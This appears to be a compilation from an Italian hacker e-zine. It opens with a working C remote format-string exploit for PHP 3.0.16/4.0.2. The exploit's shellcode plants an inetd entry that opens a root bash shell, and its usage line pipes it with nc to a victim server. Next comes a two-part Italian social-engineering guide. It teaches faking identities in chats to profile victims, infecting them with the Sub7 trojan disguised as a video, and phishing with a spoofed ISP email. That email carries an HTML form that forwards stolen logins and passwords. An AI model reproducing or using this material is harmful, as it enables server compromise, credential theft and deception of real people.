___________________________________________________________________________________________

ALTRI EXPILOT SU BUFFER OVERFLOW
TUTTO O QUASI E DUBBUGGATO NEL PRIMO MANUALE---->


/*
* PHP 3.0.16/4.0.2 remote format overflow exploit.
* Copyright (c) 2000
* Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau
* gneisenau@berlin.com
* my regards to sheib and darkx
* All rights reserved
* Pascal Boucheraine's paper was enlightening
* THERE IS NO IMPLIED OR EXPRESS WARRANTY FOR THIS CODE.
* YOU ARE RESPONSIBLE FOR YOUR OWN ACTIONS AND I CANNOT BE HELD RESPONSIBLE
* FOR THE CONSEQUENCES
* Usage:
* phpxpl -sx -uwww.victim.com/some.php3 | nc www.victim.com 80
*
* Slackware 7.0: eip address/shellcode address
* 0xbfff9b90/0xbfff958c
*
*/

/*
* We just printf the shellcode and stuff and nc it to the target
*/


#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// this exploit does not like 0x0a = '\n' in the shellcode. also the NULL at
// the end of the shellcode will be removed as the shellcode is probably
// strcatted into the buffer. so do it again in the shellcode.
/*
* This shellcode is for Linux/x86.
* This shellcode spawns a shell and runs the command
* echo 'ingreslock stream tcp nowait root /bin/bash bash
-i'>/tmp/.inetd.conf; /usr/sbin/inetd /tmp/.inetd.conf
*/

char shellcode[] = {
0xeb,0x41,
0x5e,
0x31,0xc0,
0x31,0xdb,
0xb0,0xa0,
0x89,0x34,0x06,
0x8d,0x4e,0x07,
0x88,0x19,
0x41,
0x41,
0xb0,0xa4,
0x89,0x0c,0x06,
0x8d,0x4e,0x0b,
0x88,0x19,
0x41,
0xb0,0xa8,
0x89,0x0c,0x06,
0x8d,0x4e,0x7f,
0x88,0x19,
0x31,0xd2,
0xb0,0xac,
0x89,0x14,0x06,
0x89,0xf3,
0x89,0xf1,
0xb0,0xa0,
0x01,0xc1,
0xb0,0x0b,
0xcd,0x80,
0x31,0xc0,
0xb0,0x01,
0x31,0xdb,
0xcd,0x80,
0xe8,0xba,0xff,0xff,0xff,
0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0xff,0xff, /* the string "/bin/sh" */
0x2d,0x63,0xff, /* the string "-c" */
0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20,0x27,0x69,
0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20,0x73,0x74,
0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e,0x6f,0x77,
0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f,0x62,0x69,
0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73,0x68,0x20,
0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,
0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b,0x20,0x2f,
0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69,0x6e,0x65,
0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,0x6e,0x65,
0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00,
};

#define NOP 0x90

____________________________________________________________________________________________
/*
* the PHP3 error buffer will already contain PHP 3 Warning: The Content-Type
* string was "multipart/form-data. This is 66 bytes long. we send 2 spaces
* for padding the addresses we embed in our attack buffer on word boundary
*/
#define PHP3_WARNING 68
#define BUF_LEN 1024

struct system_type {
char *name;
unsigned int nop;
char *shellcode;
int shellcode_len;
int offset; /* the number of pops we need to get to our own data*/
int already_written; /* number of bytes written by printf by the time we
reach the our embedded data */
unsigned int eip_address; /* address where shellcode_address must be put */
unsigned int shellcode_address; /* address of shellcode in memory */
};

struct system_type systems[] = {
{
"
Slackware Linux 7.0 - i386/Apache 1.3.12/PHP 3.0.16 (static module)",
0x90,
shellcode,
270, /* not exact but we got lots of space ;) */
27,
0x152,
0xbfff9c30,
0xbfff962c,
},
// somebody find these and fill it in please. should be
// straightforward.
{
"
Red Hat 6.0 - i386/Apache 1.3.13/PHP 3.0.16 (static module)",
(unsigned int)NULL,
NULL,
(int)NULL,
(int)NULL,
(int)NULL,
(unsigned int)NULL,
(unsigned int)NULL,
},
{
NULL,
(unsigned int)NULL,
NULL,
(int)NULL,
(int)NULL,
(int)NULL,
(unsigned int)NULL,
(unsigned int)NULL,
},
};

void usage (void);
void parse_url (char *, char *);
void prepare_attack_buffer (char *, struct system_type *, char *);
int calculate_precision (unsigned int, int);

int
main (int argc, char *argv[])
{
char attack_buffer[2000]; // we construct the shellcode and stuff here
// the target is 1024 bytes long
struct system_type *sysptr;
char *url; // i hope these things dont get bigger than this
char target[2048]; // target will contain only the FQDN
unsigned int eip_address = 0, shellcode_address = 0;
int ctr = 0;
int nop_count;
char *walk;
int arg;

// at least expect a system type and url from the command line
if (argc < 3)
usage ();

// parse arguments
while ((arg = getopt (argc, argv, "
s:u:e:h:")) != -1){
switch (arg){
case 'h':
sscanf (optarg, "
%x", &shellcode_address);
break;
case 'e':
sscanf (optarg, "
%x", &eip_address);
break;
case 's':
sysptr = &systems[atoi (optarg)];
break;
case 'u':
url = optarg;
parse_url (url, target);
break;
case '?':
default :
usage ();
}
}

if (eip_address)
sysptr->eip_address = eip_address;
if (shellcode_address)
sysptr->shellcode_address = shellcode_address;
prepare_attack_buffer (attack_buffer, sysptr, url);

// as of now write it out to stdout. later write it to a socket
write (STDOUT_FILENO, attack_buffer, sizeof (attack_buffer));
}

void
prepare_attack_buffer (char *attack_buffer, struct system_type *system,
char *url)
{
int dest_buffer_written; /* we keep track of how much bytes will be written
in the destination buffer */
int ctr;
char *address;
char buf[25]; // temp buffer for %xd%n%xd%n%xd%n%xd%n
// where x is precision
int p1,p2,p3,p4;
int nop_count;

bzero (attack_buffer, 2000);
sprintf (attack_buffer, "
POST http://%s HTTP/1.0\nConnection:
close\nUser-Agent: tirpitz\nContent-Type: multipart/form-data ", url);
// mark strlen here. whatever we write after here appears in the buffer
dest_buffer_written = strlen (attack_buffer);

strcat (attack_buffer, "
\x11\x11\x11\x11");
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
strcat (attack_buffer, "
\x11\x11\x11\x11");
system->eip_address++;
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
strcat (attack_buffer, "
\x11\x11\x11\x11");
system->eip_address++;
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);
strcat (attack_buffer, "
\x11\x11\x11\x11");
system->eip_address++;
address = (char *)&system->eip_address;
strncat (attack_buffer, address, 4);

/*
* we need to add %x corresponding to the number of pops we need to reach
* our embedded addresses we defined above
*/
for (; system->offset; system->offset--)
strcat (attack_buffer, "
%x ");

p1 = calculate_precision ((system->shellcode_address & 0x000000ff),
system->already_written);
p2 = calculate_precision ((system->shellcode_address & 0x0000ff00) >> 8,
system->already_written);
p3 = calculate_precision ((system->shellcode_address & 0x00ff0000) >> 16,
system->already_written);
p4 = calculate_precision ((system->shellcode_address & 0xff000000) >> 24,
system->already_written);
sprintf (buf, "
%%%dd%%n%%%dd%%n%%%dd%%n%%%dd%%n", p1, p2, p3, p4);
strcat (attack_buffer, buf);

ctr = strlen (attack_buffer);
dest_buffer_written = ctr - dest_buffer_written;
dest_buffer_written += PHP3_WARNING; // dest_buffer_written now contains the
number of bytes the PHP_WARNING and then the 8 4 byte values and then the %x
to pop off the stack
attack_buffer += ctr;
nop_count = BUF_LEN - dest_buffer_written - system->shellcode_len;
memset (attack_buffer, NOP, nop_count);
/*
* Add our shellcode at last
*/
attack_buffer += nop_count;
strcat (attack_buffer, shellcode);
strcat (attack_buffer, "
\n");
strcat (attack_buffer, "
Content-Length: 1337\n\n");
}

void
usage (void)
{
int ctr;

fprintf (stderr, "
Apache/PHP xploit\n");
fprintf (stderr, "
Field Marshal Count August Anton Wilhelm Neithardt
von Gneisenau\n");
fprintf (stderr, "
for the r00tcrew\n");
fprintf (stderr, "
All rights reserved\n");
fprintf (stderr, "
\nUsage:\n");
fprintf (stderr, "
phpxpl -u url -s systype [ -e eip address ] [ -h shellcode
address ]\n\n");
fprintf (stderr, "
url: the complete url including FQDN and script on the
server\n");
fprintf (stderr, "
www.victim.com/info.php3\n");
fprintf (stderr, "
available systypes:\n");

for (ctr = 0; systems[ctr].name; ctr++)
fprintf (stderr, "
%d. %s\n", ctr, systems[ctr].name);
fprintf (stderr, "
eip address: the address which the xploit overwrites with
buffer address (specify thus 0xbfff9c30) \n");
fprintf (stderr, "
shellcode address: the address which points to the NOPs
(specify thus 0xbfff962c)\n");
fprintf (stderr, "
\n");
exit (1);
}

void
parse_url (char *url, char *target)
{
char *ptr;

strcpy (target, url);
if (!(ptr = index (target, '/'))){
fprintf (stderr, "
invalid url. specify the script name on the target server
too\n");
exit (1);
}
*ptr = '\0';
}

/*
* addr_byte contains the byte we need to write out. for example: 2c in
* 0xbfff962c, then 96, ff and bf.
*/
int
calculate_precision (unsigned int addr_byte, int already_written_init)
{
static int already_written = 0;
int tmp;

if (!already_written)
already_written = already_written_init;

while (addr_byte < already_written)
addr_byte += 0x100;

tmp = addr_byte - already_written;
already_written = addr_byte;
return tmp;
}

[E4M]


|-----------------------------------------------------------------|
|Art. N° <8> : "
Guida al Social Engineering... Parte 1" di M3xican|
|-----------------------------------------------------------------|


/********************************************************************
GUIDA AL SOCIAL ENGINEERING APPLICATO ALLE CHAT & ALLE EMAIL v 1.0

Autore: M3xican (del Team di Napoli Hak)
Email: ilmessicano@inwind.it
ICQ: 104241710
sito: http://napolihak.da.ru
********************************************************************/


[INDICE]:

1° DISCLAIMER (per newbe & sbirri) -|
2° DISCLAIMER (per wannabe & hacker) |
1) IL SOCIAL ENGINEERING IN GENERALE |
2) DI COSA HO BISOGNO | soc_eng1.txt
3) SOCIAL ENGINEERING APPLICATO ALLE CHAT |
4) FARE MALE QUALCUNO VIA CHAT -|


5) SOCIAL ENGINEERING APPLICATO ALLE EMAIL -|
6) FARE MALE QUALCUNO VIA EMAIL |
7) COME DIFENDERSI | soc_eng2.txt
8) GLOSSARIO |
9) NOTE FINALI -|

---------------------------------------------------------------------

[1° DISCLAIMER (per newbes & sbirri)]:
Questa guida è stata realizzata per aiutare le persone, e in particolare gli
utenti inesperti, a riconoscere tentativi di truffa ed aggressione da partre
di altri, pertanto gli esempi di tecniche di attacco presenti devono
considerarsi come puri esempi atti al riconoscimento dei tali e non come
insegnamenti al danneggiamento altrui.
L'autore (il M3xican) non si assume nessuna responsabilità dell'uso errato e/o
dannoso che verrà fatto delle informazioni presenti in questa guida.

---------------------------------------------------------------------

[2° DISCLAIMER (per wannabes & hackers)]:
Questa guida è stata realizzata per aiutare le persone che sono infastidite
da stupidi lamer via chat o via email, la sto scrivendo perchè mi sono
arrivate molte email di utenti in difficoltà. Se ritieni che l'argomento sia
lamer, che io sia un lamer, che queste sono tutte cazzate, che tu avresti
saputo scrivere in maniera più semplice, più chiara, più bella, non me lo
venire a dire via email (sprechi tempo, lo so già che tu 6 un genio...),
smetti di leggere e elimina il file, nessuno ti ha chiesto di scaricarlo.

---------------------------------------------------------------------

[1) IL SOCIAL ENGINEERING IN GENERALE]
Social Engineering può essere tradotto con ingegneria sociale, ovvero la
scienza che si occupa dei rapporti con gli altri...
Il social engineering, infatti è "
l'arte" che permette di ottenere
informazioni e/o compiere azioni che normalmente sono riservate a pochi.
Come si realizza questo? Semplice, spacciandosi per uno di quei pochi!
In pratica il social engineering si basa sulla menzogna, si contatta una
vittima, ci si finge qualcun altro che in qualche modo potrebbe essere, od è,
legato alla vittima e si prova ad ottenere informazioni e/o a compiere azioni
sotto la falsa identità.

Ecco un esempio:
Se telefono a un tizio e gli chiedo di darmi il numero della sua carta di
credito, lui come minimo mi ride in faccia e mi riempie di insulti... ma se
invece chiamo il tizio e mi spaccio per un impiegato della sua banca (meglio
ancora se realmente esistente), dicendo che dobbiamo effettuare un operazione
temporanea di transito del suo capitale a causa di problemi interni e che
abbiamo bisogno del suo numero per risolverli... bhè, al 90% otterremo quello
che vogliamo (dipende sempre dall'altra persona, e da quanto riusciamo ad
essere convincenti).
Logicamente il social engineering non è una scienza esatta, se pretendete di
mandare una fake email alla casa bianca dicendo di essere Bush e di voler
sapere i codici per attivare una guerra nucleare perchè ve li siete scordati,
non credo che verrete tanto creduti...
Ricordate sempre la buona riuscita dell'operazione di social engineering si
basa sempre su due fattori:
1- La nostra abilità e furbizia.
2- La demenza della vittima =)
Spero che sia chiaro che l'esempio di prima era solo un esempio, qui non
imparerete a fottere i numeri di carta di credito (anche perchè se lo sapessi
fare non starei qui a scrivere sto manuale, ma su di una spiaggia con 1
bonazza in bikini vicino... =)!
Bene, finita la teoria iniziale, passiamo a qualcosa di più pratico.

---------------------------------------------------------------------

[2) DI COSA HO BISOGNO]

Allora, per poter comprendere appieno questa guida è necessario avere
conoscenze basi di HMTL & JAVASCRIPT, alcuni esempi che farò saranno
interamente basati su questi due linguaggi, benchè cercherò di spiegarli in
modo da farli capire anche a un dummie la conoscenza di essi è indispensabile
per chi vuole operare da se e non limitarsi a eseguire un copia e incolla dei
miei listati.
Per quanto riguarda i programmi, c'è bisogno di un buon trojan tipo sub7 e di
un buon fake mailer/bomber tipo Xmass2000 entrambi li potete trovare su
http://napolihak.da.ru .
Inoltre è necessario un requisito personale, che purtroppo nessuno vi può
dare, la rapidità di pensiero e di organizzazione. La prima è necessaria per
sapersela cavare in ogni situazione imprevista, la seconda per saper
pianificare al meglio le nostre azioni.

---------------------------------------------------------------------

[3) SOCIAL ENGINEERING APPLICATO ALLE CHAT]

Il social engineering nelle chat può essere effettuato per diverse ragioni:
- Venire a conoscenza di quante più informazioni sulla vittima per poter
essere in grado di compilare una word list con delle password che lui
potrebbe usare (per utilizzarla da qualche parte).
- Sapere l'indirizzo email della vittima.
- Ottenere l'IP della vittima.
- Infettare la vittima con un trojan.

Ma vediamo le cose con calma.

Per ottenere quante più informazioni possibili su di una vittima ci sono
diversi modi.
Il più semplice, dal punto di vista della realizzazione, è quello di chattare
con la vittima, mantenendo il dialogo sempre su di un tono molto tranquillo...
Mi spiego meglio: se contattiamo un tizo in chat e senza dargli il tempo di
parlare gli chiediamo, nome, cognome, città, hobby, ecc... difficilmente
otterremo una risposta.
Ma se con lui instauriamo un rapporto di amicizia reciproca e magari salviamo
ogni volta la conversazione che abbiamo avuto, alla fine saremo in grado di
stilare una word list.
Questa operazione può richiedere da alcuni giorni ad alcune settimane, e non
sempre porta a buoni risultati, ma in genere è la più sicura, in quanto la
vittima, se siete abili, non potrà mai sospettare nulla di voi, per qualsiasi
cosa gli accada... =)
Questa tecnica ha un problema di fondo, si basa sul dialogo, e considerando
che in genere si cerca di fare del male a persone con cui non si hanno buoni
rapporti... è un pò difficile pretendere di minacciare uno di morte e il
giorno dopo, come per magia, pretendere che chatti con voi d'amore e
d'accordo...

In questo ci può aiutare il social engineering.
Ci sono diverse tecniche per riuscire a chattare con la vittima:

1- Il modo più semplice per chattare con un uomo qual'è? Semplice... fingere
di essere una donna!
Questa tecnica permette nel 99% dei casi la buona riuscita dell'obbiettivo
preposto.
Per farlo è necessario crearsi nella chat un nick di donna (se si usano chat
basate su programmi tipo C6. altrimenti è sufficiente collegarsi con un nick
di donna nelle chat basate sul web/java), e contattare la vittima.
Il primo grande problema che si incontra utilizzando questa tecnica, è quello
che non appena si accede in chat con un nick di donna si viene bombardati da
richieste di altri uomini (richieste di sesso x di più!). Per questo è
indispensabile rendersi indisponibili a chattare con gli altri (sempre se si
usa un programma di chat tipo C6, in cui cioè, è possibile selezionare una
opzione simile) per potersi concentrare sul proprio obbiettivo.
La prima volta che usai questa tecnica non pensai a rendermi indisponibile
(stavo su C6), e appena entrai in una stanza (che era una stanza normalissima,
una di quelle fatte proprio da C6, non dagli utenti) fui contatto da 15 uomini
e dopo poco pure da una lesbica... siccome non capivo più un cazzo perchè
avere 16 finestre aperte sullo schermo non è una cosa molto gestibile...
dovetti chiudere C6!
Un altro problema è che la vittima potrebbe essere uno dei milioni di malati
sessuali che affolano le chat, che considerano la chat come una cosa erotica e
basta, in tal caso appena lo contatterete lui vi chiederà di fare sesso... in
questi casi io chiudo e passo ad altre tecniche, ma se voi avete lo stomaco di
fare sesso con un uomo per cercare di ottenere qualche password... bè, auguri!
Se invece la vittima è disposta almeno nelle prime volte al dialogo, bhè,
dateci dentro e cercate di ottenre quante più informazioni potete, magari la
prima volta fate una specie di botta-risposta per conoscerlo, in pratica
proponete che ognuno parli di se. Abbiate cura al termine della conversazione
di salvarla per poterla osservare con cura in seguito. Inoltre prima di
un'azione del genere preparate una scheda su di voi, in modo da non creare
sospetti nel caso non vi venisse al momento cosa inventare su una determinata
domanda fatta dalla vittima, per essere ancora più convincenti mandategli
anche una vostra foto... logicamente non vostra =) ma di una ragazza con cui
avete chattato, in quanto deve essere credibile (se mandate una foto presa dal
sito di pamela andersson non penso vi crederà... =).

2- Un altro metodo è quello di diventare "
colleghi" della vittima.
Ovvero prendiamo il caso che il bastardo sia uno che va nelle chat a dire cose
tipo "
meridionali di merda, terroni, ecc..", bhè... persone così non sono
altro che ignoranti e stupide, quindi degli ottimi bersagli per il social
engineering =)
Come ci dobbiamo comportare noi? Semplice, assecondiamolo, comportiamoci come
lui, diamo forza alle sue menate.
Poi contattiamolo in privato e iniziamo a chattarci.
Questa è una tecnica che può ferire un pò nell'orgoglio, in quanto io, da
napoletano, non direi nemmeno se costretto con una pistola alla tempia
"
terroni di merda", ma basta pensare che questo piccolo sacrificio con buona
probabilità ci permetterà di fare davvero del male al coglione, che tutto
risulta più facile...
Questa tecnica è un pò rischiosa, in quanto alle volte ci si fa scoprire dalla
vittima in quanto si usa un espressione o si dice qualcosa che uno come lui
non direbbe mai (se ad esempio vi scappa un'espressione napoletana tipo "
azz'"
mentre chattate con quello che attacca i terroni, vi fate scoprire).

3- Una evoluzione della tecnica precedente è quella di utilizzare due nick
contemporaneamente nella stessa chat dove è presente la vittima.
Tale tecnica può essere realizzata facilmente in chat basate sul web (tipo
quella di yahoo, ecc..) aprendo due volte contemporaneamente la stessa pagina
(quindi eseguendo due volte il browser) e entrando con due nick diversi.
Nelle chat basate su programmi c'è bisogno di un piccolo accorgimento.
Prendiamo ad esempio C6, se apriamo il programma e poi tentiamo di riaprirlo
non succede niente, in quanto il programma è già in esecuzione, ma se copiamo
la cartella in cui è contenuto in un altra cartella e da lì eseguiamo il
programma, verrà aperto una seconda volta il programma, e quindi potremmo
connetterci con due nick contemporaneamente =) (questo trucco mi è stato
svelato da Nemesys, che ringrazio).
Ora che abbiamo due nick possiamo guadagnare molto più facilmente la fiducia
della vittima.
Ad esempio con un nick lo attacchiamo, riempiendolo di parole, sfottendolo,
offendendolo, e con l'altro lo difendiamo, per poi andarlo a contattare in
privato, magari per commentare la demenza della persona che lo attaccava
(sempre voi).

Logicamente queste 3 tecniche servono solo per farvi conoscere la persona, il
dialogo poi lo dovete impostare voi a seconda dei casi, non esiste una regola
generale su come comportarsi.
L'importante è sempre di immergersi nel personaggio che si sta fingendo di
essere, in modo da non tradirsi mai.

Una volta che siete riusciti a chattare con la vittima non dovrebbe risultare
difficile ottenere la sua email, soprattutto se si utilizza un nick di ragazza
e si esegue la parte seguente:
ci si collega, si contatta la vittima, ci si parla un poco, e dopo un paio di
minuti all'improvviso si dice che per un motivo qualsiasi dovete andare
subito, ma... ma, ditegli anche che volete restare in contatto con lui, e che
volete la sua email, se lui è diffidente dategli una vostra creata
appositamente per le operazioni di social engineering e ditegli di contattarvi
lì (abbiate cura nella scelta dell'email, se il vostro nick è ad es.: bella21,
l'email non potrà essere alberto_rossi@tin.it).

Ottenere l'IP della vittima è un operazione semplicissima, basta collegarsi
con un nick di ragazza, chattare 1 pò e poi mandargli la vostra foto (quella
falsa, di cui ho parlato prima), che lui sicoramente vorrà.
Logicamente per fare ciò c'è bisogno di una chat che permette lo scambio di
files, altrimenti niente!
Non appena la foto comincerà ad essere inviata, aprite una finestra MS-Dos
(Avvio-->Esegui-->command oppure doppio clik sull'icona di ms-dos presente in
avvio) e digitate il seguente comando:

c:\>netstat -an

Tale comando visualizzerà tutte le connessioni attive al momento, e quindi
anche l'IP della vittima.
Se volete maggiori informazioni riguardo l'uso di netstat potete scaricare la
guida su di esso sempre su
http://napolihak.da.ru nella sezione MANUALI-->HACKING

Di come infettare la vittima con un trojan ne parlerò tra breve nella sezione
(4).

Tutte le tecniche illustrate sopra sono rivolte contro vittime maschi, ma se
vogliamo attaccare una ragazza?
Bhè... il discorso diventa molto più complicato, infatti (almeno su C6) le
ragazze presenti, non ti rispondono nemmmeno se dici di essere il Papa...
perchè nel 90% dei casi stanno impegnate (a fare...).
Comunque provate sempre, la speranza è l'ultima a morire.

---------------------------------------------------------------------

[4) FARE MALE QUALCUNO VIA CHAT]

Il modo per riuscire a colpire col maggior danno possibile un utente di
internet qual'è?
Semplice, infettarlo con un trojan!
Tutti gli attacchi di questo modo su IP al massimo gli fanno crashare il pc,
un trojan è (quasi) per sempre e dà poteri pressapoco illimitati sul pc
vittima!
Qui non spiegherò come usare un trojan, ma come infettare una vittima via chat.

La prima regola del social engineering è quella di fingere, camuffare e
mentire sempre. Questo cosa vi fa venire in mente...?
Per poter far eseguire un trojan alla vittima bisogna convincerla che sia un
qualcosa di totalmente diverso da una cosa dannosa, anzi, che è una cosa che
gli può interessare.
Ci sono due casi principali, quando si vuole infettare qualcuno:
1) La persona che si vuole infettare è un perfetto sconosciuto.
2) La persona che si vuole infettare ci da la sua fiducia (poichè siamo
riusciti a guadagnarla grazie alle tecniche spiegate nella sezione (3).

Il primo caso può essere più semplice in determinate condizioni, ovvero quando
si va nelle chat in cui si scambia materiale pornografico.
Entrare nella chat con la seguente frase è il 90% del lavoro: "
Chi vuole
scambiare un filmato con delle foto?"
quanto prima verrete contatti da più persone interessate allo scambio (i
malati sono tanti x fortuna =).
E cosa gli passeremo noi? Semplice, il server del trojan, ovvero la parte del
trojan che deve eseguire la vittima.
In questo caso però dovremmo sfruttare l'opzione di sub7 che permette di
modificare l'icona del server per renderla uguale a quella dei filmati .avi .
Logicamente il file sarà sempre .exe, per questo nel caso la vittima ci chieda
spiegazioni potremmo dire che è un filmato realizzato con 1 programma per il
ritocco dei filmati, che produce file eseguibili per poterli rendere
utilizzabili da tutti... questa è una mega palla, ma secondo voi chi si fa
infettare da un trojan non è uno che crede ancora a Babbo Natale? =)
Quando invece si vuole infettare un utente "
normale" bisogna considerare bene
la situazione, non esiste una regola precisa, bisogna improvisare a seconda
della situazione, non so, magari dicendo alla vittima che si è uno
sviluppatore di software e che gli si vuole fare provare la propria ultima
opera...

Il secondo caso necessita del lavoro di fraternizzazione con la vittima
spiegato nella sezione (3), ma garantisce risultati quasi sicuri.
Una volta ottenuta la fiducia della vittima potrete sempre fargli credere
quello che volete.
Ad esempio se una vostra amica vi manda un giochino via email, dicendo che è
molto carino, voi non lo provate? =)
Logicamente sta a voi creare la situazione più favorevole e la scusa più
credibile.

In entrambi i casi impostate il server del trojan in modo che produca un
messaggio di errore, così poi potrete usare la scusa che si è danneggiato
durante il collegamento.

Per quanto riguarda i possibili attacchi DoS che possono essere effettuati su
di un IP verrà realizzata in futuro una guida (poichè l'argomento è vasto e
non completamente inerente con l'argomento di questa guida), pertanto per ora
non vi anticipo niente.

Invece per cosa fare con l'email della vittima leggevi le sezioni (5) e (6)
presenti nel file soc_eng2.txt


============> LA GUIDA CONTINUA NEL FILE 'soc_eng2.txt' ============>


|-----------------------------------------------------------------|
|Art. N° <9> : "
Guida al Social Engineering... Parte 2" di M3xican|
|-----------------------------------------------------------------|


/********************************************************************
GUIDA AL SOCIAL ENGINEERING APPLICATO ALLE CHAT & ALLE EMAIL v 1.0

Autore: M3xican (del Team di Napoli Hak)
Email: ilmessicano@inwind.it
ICQ: 104241710
sito: http://napolihak.da.ru
********************************************************************/


[INDICE]:

1° DISCLAIMER (per newbe & sbirri) -|
2° DISCLAIMER (per wannabe & hacker) |
1) IL SOCIAL ENGINEERING IN GENERALE |
2) DI COSA HO BISOGNO | soc_eng1.txt
3) SOCIAL ENGINEERING APPLICATO ALLE CHAT |
4) FARE MALE QUALCUNO VIA CHAT -|


5) SOCIAL ENGINEERING APPLICATO ALLE EMAIL -|
6) FARE MALE QUALCUNO VIA EMAIL |
7) COME DIFENDERSI | soc_eng2.txt
8) GLOSSARIO |
9) NOTE FINALI -|

---------------------------------------------------------------------

[5) SOCIAL ENGINEERING APPLICATO ALLE EMAIL]

Il social engineering applicato alle email è sicuramente più difficile nella
realizzazione di quello applicato alle chat, ma se svolto con cura permette di
ottenere migliori risultati (in genere...).

Lo scopo principale del social engineering applicato alle email è quello di
ottenere una password dell'account dell'utente, del suo sito personale, ecc..
Per fare ciò ci sono diverse tecniche:

1- Ci si crea un indirizzo email dello stesso dominio della vittima, con nick
tipo serv_assist, assistenza, marketing, sevizio.assistenza ecc...
In pratica se la vittima ha un indirizzo ciccio@isp.it noi dobbiamo andare a
crearci un indirizzo tipo serv_assist@isp.it . Fatto ciò scriviamo una bella
email alla vittima in cui diciamo più o meno così:

>Gentile Utente,
> A causa di problemi tecnici alcune informazioni sui nostri utenti sono state
smarrite.
> Per poterle ripristinare abbiamo bisogno del suo login e della sua password,
pertanto la preghiamo di
> inviarceli a questo indirizzo: serv_assist@isp.it
> Certi della sua collaborazione la ringraziamo.
>
> Il Responsabile Tecnico isp.it
> Ing. Mario Monti

Logicamente potete inventare scuse meglio articolate per rendere il tutto più
credibile.
Però... questa tecnica, ha possibilità di riuscita tendente a 0... Bisogna
solo essere così fortunati da trovare un utente che ha acquistato il suo primo
pc un giorno prima (che tralatro deve essere pure un pò idiota...).
Io qui l'ho citata per non tralasciare niente, ma vi sconsiglio vivamente di
usarla, anche perchè così rischiate solo di mettere in allerta la vittima,
che riconsocerà molto più facilmente eventuali tentativi di social engineering.

2- Questa tecnica richiede una maggiore preparazione, ma garantisce
probabilità di riuscita nettamente superiori alla prima.
La prima cosa che dobbiamo fare è studiare il provider che fornisce l'email
alla vittima.
Facciamo sempre l'esempio che la vittima abbia come indirizzo cicco@isp.it .
Noi ci colleghiamo al sito di isp.it e preleviamo i loghi in esso presenti, se
magari ci creiamo un account su di esso e aspettiamo che ci venga inviata un
email da loro (in genere ogni ISP ha un servizio di newsletter abbinato alla
casella email). Terminata questa fase di studio prepariamo un email che sia
quanto più familiare al sito, e alle email inviate.
Ad esempio, se l'isp invia email mettendo in alto una fascia verde con
all'interno il suo logo, noi ripeteremo esattamente il procedimento visto nel
punto 1 ma aggiungendo i particolari grafici appropiati.
Per fare ciò è necessario conoscere l'HTML in quanto bisognerà creare una
pagina HTML per poi passare tutto il codice in un email.

3- La terza tecnica è una seccessiva evoluzione della seconda.
In pratica è richiesta la stessa preparazione con una piccola aggiunta alla
fine...
La piccola aggiunta consiste nell'inserimento di un form, ovvero di due campi
in cui la vittima deve inserire il proprio login e password e cliccare poi sul
pulsante invia.
L'email si presenterà esattamente come quella spiegata nel punto 2 soltanto
che l'aggiunta del form la farà sembrare ancora più autentica.
Però sorge un problema... per utilizzare un form è necessario poter disporre
di un server che gestisca script cgi, il che è praticamente impossibile nei
servizi gratuiti, quindi o sborsate per un server, o... vi affidate a qualche
servizio di gestione form gratuito tipo Bravenet (www.bravenet.com).
Una volta registrati al servizio vi verrà fornito il codice HTML che dovrete
inserire nel vostro sito.
Però il codice che vi verrà fornito visualizzerà la loro grafica e i loro
pulsanti, e questo a noi certo non va bene... per questo bisogna modificarlo e
renderlo simile a quello sottostante.

<FORM action="
http://pub14.bravenet.com/emailfwd/senddata.asp" method="post">

<INPUT type="
hidden" name="usernum" value="xxxxxxxx">
<INPUT type="
hidden" name="cpv" value="1">

Login: <INPUT type="
text" name="login" size="20"><BR>
Password: <INPUT type="
text" name="password" size="20"><BR><BR>

<INPUT type="
submit" name="submit" value=" Invia ">

</FORM>

(le xxxxxxxx sono il vostro numero identificativo di bravenet)

I primi due campi input non devono essere modificati, in quanto sono quelli
che bravenet usa per riconoscervi, i secondi due sono quelli che definiscono i
campi che la vittima deve compilare, l'ultimo è quello che definisce il
pulsante invia.

Il codice HTML soprastante può essere inserito in tabelle e contornato da
elementi grafici (ad esempio si può usare come pulsante invia l'immagine
utilizzate da isp.it per i suoi pulsanti).
Se magari nel sito di isp.it è presente una mascherina per accedere alla posta
via web, possiamo copiare il codice che ci interessa dalla loro pagina e
modificare solo i campi del form inerenti all'invio dei dati (che non dovranno
più essere usati per accedere all'area utente, ma che ci dovranno essere
inviati).
Il tutto sta nella vostra capacità realizzativa.

Tale tecnica è senza dubbio la migliore e la più efficace in quanto non
richiede di possedere un indirizzo email appropriato, poichè la vittima ci
invierà i dati tramite il form presente nell'email.
Quindi in questo caso dovremmo utilizzare un programma tipo Xmass2000 con cui
inviare la nostra fake email basata sull'HTML preparato.

Sia la tecnica 2 che la 3 necessitano di immagini, tali immagini possono
essere prelevate dal sito proprietario dell'email della vittima (negli esempi
fatti isp.it) e caricate su un qualsiasi server gratuito (ormai ogni ISP
offre uno spaio web gratuito) per poterle poi utlizzare quando si vuole ed
evitare che eventuali aggiornamenti del sito da cui sono state prelevate
compromettano il nostro operato.
Se infatti ad esempio il logo di isp.it ha indirizzo
http://isp.it/img/loghi/logo_main.gif e noi utilizziamo questo indirizzo nel
nostro codice HTML e libero lo cambia per qualsiasi motivo, bhè... il nostro
piano fallisce ancora prima di cominciare!

---------------------------------------------------------------------

[6) FARE MALE QUALCUNO VIA EMAIL]

Ci sono diversi modi di fare male qualcuno via email, ma anche qui il modo
che comporta maggior danno è quello di riuscire a infettarlo con un trojan.
